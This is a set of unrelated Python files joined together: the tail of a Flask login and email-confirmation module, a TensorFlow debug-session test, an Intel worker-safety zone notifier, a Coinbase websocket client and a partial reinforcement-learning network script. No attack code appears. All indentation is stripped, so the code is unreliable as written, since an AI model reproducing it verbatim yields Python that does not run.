if urlparse(next_url).scheme != '' or urlparse(next_url).netloc != '':
current_app.logger.info(f'Invalid next path in login request: {next_url}')
logout_user()
return abort(400)
current_app.logger.info(f'Redirecting after valid login to: {next_url}')
return redirect(next_url)
flash('ERROR! Incorrect login credentials.')
return render_template('users/login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
current_app.logger.info(f'Logged out user: {current_user.email}')
logout_user()
flash('Goodbye!')
return redirect(url_for('stocks.index'))
@users_blueprint.route('/profile')
@login_required
def user_profile():
return render_template('users/profile.html')
def generate_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
confirm_url = url_for('users.confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
return Message(subject='Flask Stock Portfolio App - Confirm Your Email Address',
html=render_template('users/email_confirmation.html', confirm_url=confirm_url),
recipients=[user_email])
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except BadSignature as e:
flash(f'The confirmation link is invalid or has expired.', 'error')
current_app.logger.info(f'Invalid or expired confirmation link received from IP address: {request.remote_addr}')
return redirect(url_for('users.login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
current_app.logger.info(f'Confirmation link received for a confirmed user: {user.email}')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
database.session.add(user)
database.session.commit()
flash('Thank you for confirming your email address!', 'success')
current_app.logger.info(f'Email address confirmed for: {user.email}')
return redirect(url_for('stocks.index')) |
framework_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Framework of debug-wrapped sessions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
import threading
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import framework
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestDebugWrapperSession(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test."""
def __init__(self, sess, dump_root, observer, thread_name_filter=None):
# Supply dump root.
self._dump_root = dump_root
# Supply observer.
self._obs = observer
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(
self, sess, thread_name_filter=thread_name_filter)
def on_session_init(self, request):
"""Override abstract on-session-init callback method."""
self._obs["sess_init_count"] += 1
self._obs["request_sess"] = request.session
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
"""Override abstract on-run-start callback method."""
self._obs["on_run_start_count"] += 1
self._obs["run_fetches"] = request.fetches
self._obs["run_feed_dict"] = request.feed_dict
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN,
["file://" + self._dump_root])
def on_run_end(self, request):
"""Override abstract on-run-end callback method."""
self._obs["on_run_end_count"] += 1
self._obs["performed_action"] = request.performed_action
self._obs["tf_error"] = request.tf_error
return framework.OnRunEndResponse()
class TestDebugWrapperSessionBadAction(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test.
This class intentionally puts a bad action value in OnSessionInitResponse
and/or in OnRunStartAction to test the handling of such invalid cases.
"""
def __init__(
self,
sess,
bad_init_action=None,
bad_run_start_action=None,
bad_debug_urls=None):
"""Constructor.
Args:
sess: The TensorFlow Session object to be wrapped.
bad_init_action: (str) bad action value to be returned during the
on-session-init callback.
bad_run_start_action: (str) bad action value to be returned during the
the on-run-start callback.
bad_debug_urls: Bad URL values to be returned during the on-run-start
callback.
"""
self._bad_init_action = bad_init_action
self._bad_run_start_action = bad_run_start_action
self._bad_debug_urls = bad_debug_urls
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(self, sess)
def on_session_init(self, request):
if self._bad_init_action:
return framework.OnSessionInitResponse(self._bad_init_action)
else:
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
debug_urls = self._bad_debug_urls or []
if self._bad_run_start_action:
return framework.OnRunStartResponse(
self._bad_run_start_action, debug_urls)
else:
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN, debug_urls)
def on_run_end(self, request):
return framework.OnRunEndResponse()
class DebugWrapperSessionTest(test_util.TensorFlowTestCase):
def setUp(self):
self._observer = {
"sess_init_count": 0,
"request_sess": None,
"on_run_start_count": 0,
"run_fetches": None,
"run_feed_dict": None,
"on_run_end_count": 0,
"performed_action": None,
"tf_error": None,
}
self._dump_root = tempfile.mkdtemp()
self._sess = session.Session()
self._a_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
self._b_init_val = np.array([[2.0], [-1.0]])
self._c_val = np.array([[-4.0], [6.0]])
self._a_init = constant_op.constant(
self._a_init_val, shape=[2, 2], name="a_init")
self._b_init = constant_op.constant(
self._b_init_val, shape=[2, 1], name="b_init")
self._ph = array_ops.placeholder(dtype=dtypes.float64, name="ph")
self._a = variables.Variable(self._a_init, name="a1")
self._b = variables.Variable(self._b_init, name="b")
self._c = constant_op.constant(self._c_val, shape=[2, 1], name="c")
# Matrix product of a and b.
self._p = math_ops.matmul(self._a, self._b, name="p1")
# Matrix product of a and ph.
self._q = math_ops.matmul(self._a, self._ph, name="q")
# Sum of two vectors.
self._s = math_ops.add(self._p, self._c, name="s")
# Initialize the variables.
self._sess.run(self._a.initializer)
self._sess.run(self._b.initializer)
def tearDown(self):
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
ops.reset_default_graph()
def testSessionInit(self):
self.assertEqual(0, self._observer["sess_init_count"])
wrapper_sess = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# Assert that on-session-init callback is invoked.
self.assertEqual(1, self._observer["sess_init_count"])
# Assert that the request to the on-session-init callback carries the
# correct session object.
self.assertEqual(self._sess, self._observer["request_sess"])
# Verify that the wrapper session implements the session.SessionInterface.
self.assertTrue(isinstance(wrapper_sess, session.SessionInterface))
self.assertEqual(self._sess.sess_str, wrapper_sess.sess_str)
self.assertEqual(self._sess.graph, wrapper_sess.graph)
self.assertEqual(self._sess.graph_def, wrapper_sess.graph_def)
# Check that the partial_run_setup and partial_run are not implemented for
# the debug wrapper session.
with self.assertRaises(NotImplementedError):
wrapper_sess.partial_run_setup(self._p)
def testInteractiveSessionInit(self):
"""The wrapper should work also on other subclasses of session.Session."""
TestDebugWrapperSession(
session.InteractiveSession(), self._dump_root, self._observer)
def testSessionRun(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer)
# Check initial state of the observer.
self.assertEqual(0, self._observer["on_run_start_count"])
self.assertEqual(0, self._observer["on_run_end_count"])
s = wrapper.run(self._s)
# Assert the run return value is correct.
self.assertAllClose(np.array([[3.0], [4.0]]), s)
# Assert the on-run-start method is invoked.
self.assertEqual(1, self._observer["on_run_start_count"])
# Assert the on-run-start request reflects the correct fetch.
self.assertEqual(self._s, self._observer["run_fetches"])
# Assert the on-run-start request reflects the correct feed_dict.
self.assertIsNone(self._observer["run_feed_dict"])
# Assert the file debug URL has led to dump on the filesystem.
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(7, len(dump.dumped_tensor_data))
# Assert the on-run-end method is invoked.
self.assertEqual(1, self._observer["on_run_end_count"])
# Assert the performed action field in the on-run-end callback request is
# correct.
self.assertEqual(
framework.OnRunStartAction.DEBUG_RUN,
self._observer["performed_action"])
# No TensorFlow runtime error should have happened.
self.assertIsNone(self._observer["tf_error"])
def testSessionInitInvalidSessionType(self):
"""Attempt to wrap a non-Session-type object should cause an exception."""
wrapper = TestDebugWrapperSessionBadAction(self._sess)
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
TestDebugWrapperSessionBadAction(wrapper)
def testSessionInitBadActionValue(self):
with self.assertRaisesRegexp(
ValueError, "Invalid OnSessionInitAction value: nonsense_action"):
TestDebugWrapperSessionBadAction(
self._sess, bad_init_action="nonsense_action")
def testRunStartBadActionValue(self):
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_run_start_action="nonsense_action")
with self.assertRaisesRegexp(
ValueError, "Invalid OnRunStartAction value: nonsense_action"):
wrapper.run(self._s)
def testRunStartBadURLs(self):
# debug_urls ought to be a list of str, not a str. So an exception should
# be raised during a run() call.
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_debug_urls="file://foo")
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
wrapper.run(self._s)
def testErrorDuringRun(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# No matrix size mismatch.
self.assertAllClose(
np.array([[11.0], [-1.0]]),
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0]])}))
self.assertEqual(1, self._observer["on_run_end_count"])
self.assertIsNone(self._observer["tf_error"])
# Now there should be a matrix size mismatch error.
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0], [3.0]])})
self.assertEqual(2, self._observer["on_run_end_count"])
self.assertTrue(
isinstance(self._observer["tf_error"], errors.InvalidArgumentError))
def testUsingWrappedSessionShouldWorkAsContextManager(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper as sess:
sess.run(self._s)
def testUsingWrappedSessionShouldSupportEvalWithAsDefault(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper.as_default():
foo = constant_op.constant(42, name="foo")
self.assertEqual(42, foo.eval())
self.assertEqual(foo, self._observer["run_fetches"])
def testWrapperShouldSupportSessionClose(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
wrapper.close()
def testWrapperThreadNameFilterMainThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter="MainThread")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("a_init", dump.dumped_tensor_data[0].node_name)
def testWrapperThreadNameFilterChildThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=r"Child.*")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("b_init", dump.dumped_tensor_data[0].node_name)
def testWrapperThreadNameFilterBothThreads(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=None)
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertEqual(2, dump.size)
self.assertItemsEqual(
["a_init", "b_init"],
[datum.node_name for datum in dump.dumped_tensor_data])
if __name__ == "__main__":
googletest.main()
|
restricted_zone_notifier.py | """Restricted Zone Notifier."""
"""
Copyright (c) 2018 Intel Corporation.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit person to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import sys
import json
import time
import socket
import cv2
import logging as log
import paho.mqtt.client as mqtt
from threading import Thread
from collections import namedtuple
from argparse import ArgumentParser
from inference import Network
# Assemblyinfo contains information about assembly area
MyStruct = namedtuple("assemblyinfo", "safe")
INFO = MyStruct(True)
# MQTT server environment variables
HOSTNAME = socket.gethostname()
IPADDRESS = socket.gethostbyname(HOSTNAME)
TOPIC = "Restricted_zone_python"
MQTT_HOST = IPADDRESS
MQTT_PORT = 1883
MQTT_KEEPALIVE_INTERVAL = 60
# Global variables
TARGET_DEVICE = 'CPU'
accepted_devices = ['CPU', 'GPU', 'MYRIAD', 'HETERO:FPGA,CPU', 'HDDL']
is_async_mode = True
CONFIG_FILE = '../resources/config.json'
# Flag to control background thread
KEEP_RUNNING = True
DELAY = 5
def build_argparser():
"""
Parse command line arguments.
:return: Command line arguments
"""
parser = ArgumentParser()
parser.add_argument("-m", "--model", required=True, type=str,
help="Path to an .xml file with a trained model.")
parser.add_argument("-l", "--cpu_extension", type=str, default=None,
help="MKLDNN (CPU)-targeted custom layers. Absolute "
"path to a shared library with the kernels impl.")
parser.add_argument("-d", "--device", default="CPU", type=str,
help="Specify the target device to infer on; "
"CPU, GPU, FPGA, HDDL, MYRIAD is acceptable. To run with multiple devices use "
"MULTI:<device1>,<device2>,etc. Application "
"will look for a suitable plugin for device specified"
"(CPU by default)")
parser.add_argument("-th", "--prob_threshold", default=0.5, type=float,
help="Probability threshold for detections filtering")
parser.add_argument('-x', '--pointx', default=0, type=int,
help="X coordinate of the top left point of assembly"
" area on camera feed.")
parser.add_argument('-y', '--pointy', default=0, type=int,
help="Y coordinate of the top left point of assembly"
" area on camera feed.")
parser.add_argument('-w', '--width', default=0, type=int,
help="Width of the assembly area in pixels.")
parser.add_argument('-ht', '--height', default=0, type=int,
help="Height of the assembly area in pixels.")
parser.add_argument('-r', '--rate', default=1, type=int,
help="Number of seconds between data updates "
"to MQTT server")
parser.add_argument("-f", "--flag", help="sync or async", default="async", type=str)
global TARGET_DEVICE, is_async_mode
args = parser.parse_args()
if args.device:
TARGET_DEVICE = args.device
if args.flag == "sync":
is_async_mode = False
else:
is_async_mode = True
return parser
def check_args():
# ArgumentParser checks the device
global TARGET_DEVICE
if 'MULTI' not in TARGET_DEVICE and TARGET_DEVICE not in accepted_devices:
print("Unsupported device: " + TARGET_DEVICE)
sys.exit(2)
elif 'MULTI' in TARGET_DEVICE:
target_devices = TARGET_DEVICE.split(':')[1].split(',')
for multi_device in target_devices:
if multi_device not in accepted_devices:
print("Unsupported device: " + TARGET_DEVICE)
sys.exit(2)
def ssd_out(res, args, initial_wh, selected_region):
"""
Parse SSD output.
:param res: Detection results
:param args: Parsed arguments
:param initial_wh: Initial width and height of the frame
:param selected_region: Selected region coordinates
:return: None
"""
global INFO
person = []
INFO = INFO._replace(safe=True)
for obj in res[0][0]:
# Draw objects only when probability is more than specified threshold
if obj[2] > args.prob_threshold:
xmin = int(obj[3] * initial_wh[0])
ymin = int(obj[4] * initial_wh[1])
xmax = int(obj[5] * initial_wh[0])
ymax = int(obj[6] * initial_wh[1])
person.append([xmin, ymin, xmax, ymax])
for p in person:
# area_of_person gives area of the detected person
area_of_person = (p[2] - p[0]) * (p[3] - p[1])
x_max = max(p[0], selected_region[0])
x_min = min(p[2], selected_region[0] + selected_region[2])
y_min = min(p[3], selected_region[1] + selected_region[3])
y_max = max(p[1], selected_region[1])
point_x = x_min - x_max
point_y = y_min - y_max
# area_of_intersection gives area of intersection of the
# detected person and the selected area
area_of_intersection = point_x * point_y
if point_x < 0 or point_y < 0:
continue
else:
if area_of_person > area_of_intersection:
# assembly line area flags
INFO = INFO._replace(safe=True)
else:
# assembly line area flags
INFO = INFO._replace(safe=False)
def message_runner():
"""
Publish worker status to MQTT topic.
Pauses for rate second(s) between updates
:return: None
"""
while KEEP_RUNNING:
time.sleep(1)
CLIENT.publish(TOPIC, payload=json.dumps({"Worker safe": INFO.safe,
"Alert": not INFO.safe}))
def main():
"""
Load the network and parse the output.
:return: None
"""
global DELAY
global CLIENT
global SIG_CAUGHT
global KEEP_RUNNING
global TARGET_DEVICE
global is_async_mode
CLIENT = mqtt.Client()
CLIENT.connect(MQTT_HOST, MQTT_PORT, MQTT_KEEPALIVE_INTERVAL)
CLIENT.subscribe(TOPIC)
log.basicConfig(format="[ %(levelname)s ] %(message)s",
level=log.INFO, stream=sys.stdout)
args = build_argparser().parse_args()
logger = log.getLogger()
render_time = 0
roi_x = args.pointx
roi_y = args.pointy
roi_w = args.width
roi_h = args.height
check_args()
assert os.path.isfile(CONFIG_FILE), "{} file doesn't exist".format(CONFIG_FILE)
config = json.loads(open(CONFIG_FILE).read())
for idx, item in enumerate(config['inputs']):
if item['video'].isdigit():
input_stream = int(item['video'])
else:
input_stream = item['video']
cap = cv2.VideoCapture(input_stream)
if not cap.isOpened():
logger.error("ERROR! Unable to open video source")
sys.exit(1)
# Init inference request IDs
cur_request_id = 0
next_request_id = 1
# Initialise the class
infer_network = Network()
# Load the network to IE plugin to get shape of input layer
n, c, h, w = infer_network.load_model(args.model, TARGET_DEVICE, 1, 1, 2, args.cpu_extension)[1]
message_thread = Thread(target=message_runner, args=())
message_thread.setDaemon(True)
message_thread.start()
if is_async_mode:
print("Application running in async mode...")
else:
print("Application running in sync mode...")
ret, frame = cap.read()
while ret:
ret, next_frame = cap.read()
if not ret:
KEEP_RUNNING = False
break
initial_wh = [cap.get(3), cap.get(4)]
if next_frame is None:
KEEP_RUNNING = False
log.error("ERROR! blank FRAME grabbed")
break
# If either default values or negative numbers are given,
# then we will default to start of the FRAME
if roi_x <= 0 or roi_y <= 0:
roi_x = 0
roi_y = 0
if roi_w <= 0:
roi_w = next_frame.shape[1]
if roi_h <= 0:
roi_h = next_frame.shape[0]
key_pressed = cv2.waitKey(1)
# 'c' key pressed
if key_pressed == 99:
# Give operator chance to change the area
# Select rectangle from left upper corner, dont display crosshair
ROI = cv2.selectROI("Assembly Selection", frame, True, False)
print("Assembly Area Selection: -x = {}, -y = {}, -w = {},"
" -h = {}".format(ROI[0], ROI[1], ROI[2], ROI[3]))
roi_x = ROI[0]
roi_y = ROI[1]
roi_w = ROI[2]
roi_h = ROI[3]
cv2.destroyAllWindows()
cv2.rectangle(frame, (roi_x, roi_y),
(roi_x + roi_w, roi_y + roi_h), (0, 0, 255), 2)
selected_region = [roi_x, roi_y, roi_w, roi_h]
in_frame_fd = cv2.resize(next_frame, (w, h))
# Change data layout from HWC to CHW
in_frame_fd = in_frame_fd.transpose((2, 0, 1))
in_frame_fd = in_frame_fd.reshape((n, c, h, w))
# Start asynchronous inference for specified request.
inf_start = time.time()
if is_async_mode:
# Async enabled and only one video capture
infer_network.exec_net(next_request_id, in_frame_fd)
else:
# Async disabled
infer_network.exec_net(cur_request_id, in_frame_fd)
# Wait for the result
infer_network.wait(cur_request_id)
det_time = time.time() - inf_start
# Results of the output layer of the network
res = infer_network.get_output(cur_request_id)
# Parse SSD output
ssd_out(res, args, initial_wh, selected_region)
# Draw performance stats
inf_time_message = "Inference time: N\A for async mode" if is_async_mode else \
"Inference time: {:.3f} ms".format(det_time * 1000)
render_time_message = "OpenCV rendering time: {:.3f} ms". \
format(render_time * 1000)
if not INFO.safe:
warning = "HUMAN IN ASSEMBLY AREA: PAUSE THE MACHINE!"
cv2.putText(frame, warning, (15, 100), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 255), 2)
log_message = "Async mode is on." if is_async_mode else \
"Async mode is off."
cv2.putText(frame, log_message, (15, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 1)
cv2.putText(frame, inf_time_message, (15, 35), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 255), 1)
cv2.putText(frame, render_time_message, (15, 55), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 255), 1)
cv2.putText(frame, "Worker Safe: {}".format(INFO.safe), (15, 75), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 255), 1)
render_start = time.time()
cv2.imshow("Restricted Zone Notifier", frame)
render_end = time.time()
render_time = render_end - render_start
frame = next_frame
if key_pressed == 27:
print("Attempting to stop background threads")
KEEP_RUNNING = False
break
# Tab key pressed
if key_pressed == 9:
is_async_mode = not is_async_mode
print("Switched to {} mode".format("async" if is_async_mode else "sync"))
if is_async_mode:
# Swap infer request IDs
cur_request_id, next_request_id = next_request_id, cur_request_id
infer_network.clean()
message_thread.join()
cap.release()
cv2.destroyAllWindows()
CLIENT.disconnect()
if __name__ == '__main__':
main()
|
websocket_client.py | # cbpro/WebsocketClient.py
# original author: Daniel Paquin
# mongo "support" added by Drew Rice
#
#
# Template object to receive messages from the Coinbase Websocket Feed
from __future__ import print_function
import json
import base64
import hmac
import hashlib
import time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from pymongo import MongoClient
from cbpro.cbpro_auth import get_auth_headers
class WebsocketClient(object):
def __init__(self, url="wss://ws-feed.pro.coinbase.com", products=None, message_type="subscribe", mongo_collection=None,
should_print=True, auth=False, api_key="", api_secret="", api_passphrase="", channels=None):
self.url = url
self.products = products
self.channels = channels
self.type = message_type
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.auth = auth
self.api_key = api_key
self.api_secret = api_secret
self.api_passphrase = api_passphrase
self.should_print = should_print
self.mongo_collection = mongo_collection
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.thread.start()
def _connect(self):
if self.products is None:
self.products = ["BTC-USD"]
elif not isinstance(self.products, list):
self.products = [self.products]
if self.url[-1] == "/":
self.url = self.url[:-1]
if self.channels is None:
sub_params = {'type': 'subscribe', 'product_ids': self.products}
else:
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
if self.auth:
timestamp = str(time.time())
message = timestamp + 'GET' + '/users/self/verify'
auth_headers = get_auth_headers(timestamp, message, self.api_key, self.api_secret, self.api_passphrase)
sub_params['signature'] = auth_headers['CB-ACCESS-SIGN']
sub_params['key'] = auth_headers['CB-ACCESS-KEY']
sub_params['passphrase'] = auth_headers['CB-ACCESS-PASSPHRASE']
sub_params['timestamp'] = auth_headers['CB-ACCESS-TIMESTAMP']
self.ws = create_connection(self.url)
self.ws.send(json.dumps(sub_params))
def _listen(self):
while not self.stop:
try:
start_t = 0
if time.time() - start_t >= 30:
# Set a 30 second ping to keep connection alive
self.ws.ping("keepalive")
start_t = time.time()
data = self.ws.recv()
msg = json.loads(data)
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException as e:
pass
self.on_close()
def close(self):
self.stop = True
self.thread.join()
def on_open(self):
if self.should_print:
print("-- Subscribed! --\n")
def on_close(self):
if self.should_print:
print("\n-- Socket Closed --")
def on_message(self, msg):
if self.should_print:
print(msg)
if self.mongo_collection: # dump JSON to given mongo collection
self.mongo_collection.insert_one(msg)
def on_error(self, e, data=None):
self.error = e
self.stop = True
print('{} - data: {}'.format(e, data))
if __name__ == "__main__":
import sys
import cbpro
import time
class MyWebsocketClient(cbpro.WebsocketClient):
def on_open(self):
self.url = "wss://ws-feed.pro.coinbase.com/"
self.products = ["BTC-USD", "ETH-USD"]
self.message_count = 0
print("Let's count the messages!")
def on_message(self, msg):
print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
def on_close(self):
print("-- Goodbye! --")
wsClient = MyWebsocketClient()
wsClient.start()
print(wsClient.url, wsClient.products)
try:
while True:
print("\nMessageCount =", "%i \n" % wsClient.message_count)
time.sleep(1)
except KeyboardInterrupt:
wsClient.close()
if wsClient.error:
sys.exit(1)
else:
sys.exit(0)
|
emtbg.py | import pickle
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
import torch.utils.data
import torch.multiprocessing as mp
import os.path
import os
import sys
import time
from operator import itemgetter
import six
assert six.PY3
from env import Game
from utils import props, notify
import jingweiz
###### CONFIG #########
max_episodes = 1000
disable_curriculum = False
target_q_ts = 60 * 5
test_epsilon = 0
test_text = False
learning_rate = 5e-4
#epsilon = 0.2
epsilon1 = 0.5
epsilon2 = 0.1
save_every = 60 * 10
notify_every = 60 * 10
#gamma = 0.5
gamma = 0.9
name="weights.pkl"
name_stats="stats.pkl"
n_cpu = int(mp.cpu_count()) / 2
n_cpu = 60
#######################
embedding_dim = 20
hidden_size = 20
hidden_size2 = 20
Net = None
class Net_dnc(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_dnc, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
class Empty():
use_cuda = False
dtype = torch.FloatTensor
args = Empty()
args.batch_size = 1
args.input_dim = hidden_size
args.output_dim = hidden_size
args.hidden_dim = 64
args.num_write_heads = 1
args.num_read_heads = 4
args.mem_hei = 16
args.mem_wid = 16
args.clip_value = 20.
args.controller_params = Empty()
args.accessor_params = Empty()
args.accessor_params.write_head_params = Empty()
args.accessor_params.write_head_params.num_allowed_shifts = 3
args.accessor_params.read_head_params = Empty()
args.accessor_params.read_head_params.num_allowed_shifts = 3
args.accessor_params.memory_params = Empty()
self.circuit = jingweiz.DNCCircuit(args)
self.linear = nn.Linear(hidden_size + hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
self.circuit._reset()
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
x4b = self.circuit(x4)
x4b = x4b.view((1,-1))
x4c = torch.cat((x4, x4b), 1)
x5 = F.relu(self.linear(x4c))
return self.objects(x5)
class Net_none(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_none, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
self.linear = nn.Linear(hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
pass
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
x5 = F.relu(self.linear(x4))
return self.objects(x5)
class Net_avg(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_avg, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
self.linear = nn.Linear(hidden_size + hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
self.avg = np.zeros((1, hidden_size))
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
x4b = Variable(torch.Tensor(self.avg))
self.avg = self.avg + x4.data.numpy()
x4c = torch.cat((x4, x4b), 1)
x5 = F.relu(self.linear(x4c))
return self.objects(x5)
class Net_lstm(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_lstm, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
self.cell = nn.LSTMCell(hidden_size, hidden_size)
self.linear = nn.Linear(hidden_size + hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
self.cx = Variable(torch.Tensor(np.zeros((1, hidden_size))))
self.hx = Variable(torch.Tensor(np.zeros((1, hidden_size))))
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
self.hx, self.cx = self.cell(x4, (self.hx, self.cx))
x4b = self.hx
